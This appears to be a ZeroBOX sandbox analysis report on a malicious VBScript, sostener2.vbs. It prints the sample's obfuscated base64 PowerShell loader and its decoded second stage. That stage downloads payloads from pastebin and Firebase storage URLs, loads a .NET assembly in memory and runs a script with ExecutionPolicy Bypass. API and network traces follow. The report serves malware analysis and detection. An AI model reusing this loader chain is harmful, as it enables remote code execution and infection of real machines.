popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

sostener2.vbs

Generic Malware Antivirus Hide_URL PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 April 10, 2025, 10:53 a.m. April 10, 2025, 10:57 a.m.
Size 8.5MB
Type Little-endian UTF-16 Unicode text, with CRLF line terminators
MD5 5edb4498d69d24c6d9d620b602c7c349
SHA256 c1c109901c820411fc15e39e32e19ac5e993930021a55689a9ba040d283ed9b5
CRC32 0EB3687F
ssdeep 192:jlPUdjeZvsBef7e3vtEMUETN9Bg/+m6w6RACeCydCc7o:YQb7SOE9i+m6w6RACeC4Cgo
Yara
  • Antivirus - Contains references to security software

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\sostener2.vbs

    2620

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★B6★Fg★RwBr★GE★eQBV★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★E0★aQBz★GU★cgBp★GM★bwBy★GQ★aQBv★HM★bwBB★G0★ZQBu★C4★QwBs★GE★cwBz★DE★Jw★n★C★★KQ★u★Ec★ZQB0★E0★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★GU★d★Bo★G8★Z★★o★C★★Jw★n★E0★cwBx★EI★SQBi★Fk★Jw★n★C★★KQ★u★Ek★bgB2★G8★awBl★Cg★I★★k★G4★dQBs★Gw★I★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★I★★n★Cc★d★B4★HQ★Lg★1★DI★M★★y★GY★ZgBl★HQ★cwBv★HM★LwBz★GQ★YQBv★Gw★bgB3★G8★Z★★v★GU★ZwBy★G8★ZQBn★C8★N★★x★DU★MgBl★Gc★cgBv★Go★LwBn★HI★bw★u★HQ★ZQBr★GM★dQBi★HQ★aQBi★C8★Lw★6★HM★c★B0★HQ★a★★n★Cc★I★★s★C★★Jw★n★CU★SgBr★FE★YQBz★EQ★ZgBn★HI★V★Bn★CU★Jw★n★C★★L★★g★Cc★JwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★LQ★t★C0★LQ★t★C0★LQ★n★Cc★L★★g★Cc★Jw★w★Cc★Jw★s★C★★Jw★n★DE★Jw★n★Cw★I★★n★Cc★UgBv★GQ★YQ★n★Cc★I★★g★Ck★I★★p★C★★Ow★n★C★★Ow★k★FY★QgBX★Fc★eg★g★D0★I★★o★C★★WwBT★Hk★cwB0★GU★bQ★u★Ek★Tw★u★F★★YQB0★Gg★XQ★6★Do★RwBl★HQ★V★Bl★G0★c★BQ★GE★d★Bo★Cg★KQ★g★Cs★I★★n★GQ★b★Bs★D★★Mw★u★H★★cw★x★Cc★I★★p★C★★Ow★k★E0★TwBE★FI★Zw★g★Hw★I★BP★HU★d★★t★EY★aQBs★GU★I★★t★EY★aQBs★GU★U★Bh★HQ★a★★g★CQ★VgBC★Fc★VwB6★C★★I★★t★GY★bwBy★GM★ZQ★g★Ds★c★Bv★Hc★ZQBy★HM★a★Bl★Gw★b★★g★C0★RQB4★GU★YwB1★HQ★aQBv★G4★U★Bv★Gw★aQBj★Hk★I★BC★Hk★c★Bh★HM★cw★g★C0★RgBp★Gw★ZQ★g★CQ★VgBC★Fc★VwB6★C★★Ow★=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\test22\AppData\Local\Temp\sostener2.vbs');powershell $Yolopolhggobek;

      2744

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/pzXGkayU' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''txt.5202ffetsos/sdaolnwod/egroeg/4152egroj/gro.tekcubtib//:sptth'' , ''C:\Users\test22\AppData\Local\Temp\sostener2.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"

        2864

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49166 -> 172.67.25.94:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49167 -> 142.250.197.106:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49166
172.67.25.94:443 		C=US, O=Google Trust Services, CN=WR1 CN=pastebin.com 23:0a:6d:10:e8:e5:69:5e:8b:b3:d5:f7:68:b4:87:dc:57:ae:82:c7
TLSv1
192.168.56.101:49167
142.250.197.106:443 		C=US, O=Google Trust Services, CN=WE2 CN=upload.video.google.com 62:3a:f6:bd:3a:0b:ed:3b:16:28:ba:75:d2:00:cf:50:37:6c:20:50

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: At line:1 char:35
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + [System.Net.ServicePointManager]:: <<<< SecurityProtocol = [System.Net.Securi
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: tyProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/pzXGkayU' ;$IepGQ = (
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempP
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: ath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: $MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$M
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: ODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace('
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: '$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $F
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: yfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg +=
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''txt.5202ffetsos/sdaolnwod/
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: egroeg/4152egroj/gro.tekcubtib//:sptth'' , ''C:\Users\test22\AppData\Local\Temp
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: \sostener2.vbs'' , ''____________________________________________-------'', ''0
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: '', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll0
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: 3.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPoli
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: cy Bypass -File $VBWWz ;
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x00000137
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x00000143
1 1 0

WriteConsoleW

 buffer: Exception calling "DownloadString" with "1" argument(s): "The remote server ret
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: urned an error: (400) Bad Request."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At line:1 char:570
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProt
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: ocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/pzXGkayU' ;$IepGQ = ( [Syst
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: em.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.We
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: bClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FileP
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: ath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath()
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [Sy
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: stem.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $Ph
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: rlN.DownloadString <<<< ( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: $MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$M
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: ODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace('
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: '$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $F
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: yfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg +=
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''txt.5202ffetsos/sdaolnwod/
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: egroeg/4152egroj/gro.tekcubtib//:sptth'' , ''C:\Users\test22\AppData\Local\Temp
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: \sostener2.vbs'' , ''____________________________________________-------'', ''0
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: '', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll0
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: 3.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPoli
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: cy Bypass -File $VBWWz ;
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: You cannot call a method on a null-valued expression.
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\dll03.ps1:1 char:160
console_handle: 0x0000002f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001839d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00184550
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00184550
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00184550
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00184550
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00184550
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00184550
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001840d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001840d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001840d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00183d10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00183dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00183dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005c0bc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005c0d40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005c0d40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005c0d40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bff00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bff00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bff00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bff00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bff00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bff00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header suspicious_request GET https://pastebin.com/raw/pzXGkayU
suspicious_features GET method with no useragent header suspicious_request GET https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll/rodadll.txt?alt=media&token=aa0328ac-1aba-4a7b-89a6-42621f5aa921
request GET https://pastebin.com/raw/pzXGkayU
request GET https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll/rodadll.txt?alt=media&token=aa0328ac-1aba-4a7b-89a6-42621f5aa921
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2744
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02662000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

